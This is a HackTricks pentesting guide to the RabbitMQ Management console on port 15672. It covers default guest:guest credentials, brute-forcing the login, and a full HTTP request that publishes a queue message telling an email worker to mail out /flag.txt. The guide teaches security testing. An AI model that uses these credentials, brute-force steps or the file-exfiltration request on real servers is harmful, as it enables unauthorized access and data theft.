15672 - Pentesting RabbitMQ Management
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
.png?alt=media&token=13f4d279-7d3f-47ce-a68e-35f9a906973f)
If you are interested in hacking carer and hack the unhackable - we are hiring! (fluent polish written and spoken required).
You can learn more about RabbitMQ in 5671,5672 - Pentesting AMQP.
In this port you may find the RabbitMQ Management web console if the management plugin is enabled.
The main page should looks like this:
The default credentials are "guest":"guest". If they aren't working you may try to brute-force the login.
To manually start this module you need to execute:
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
Once you have correctly authenticated you will see the admin console:
Also, if you have valid credentials you may find interesting the information of
http://localhost:15672/api/connectionsNote also that it's possible to publish data inside a queue using the API of this service with a request like:
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"[email protected]\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
port:15672 http
If you are interested in hacking carer and hack the unhackable - we are hiring! (fluent polish written and spoken required).
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!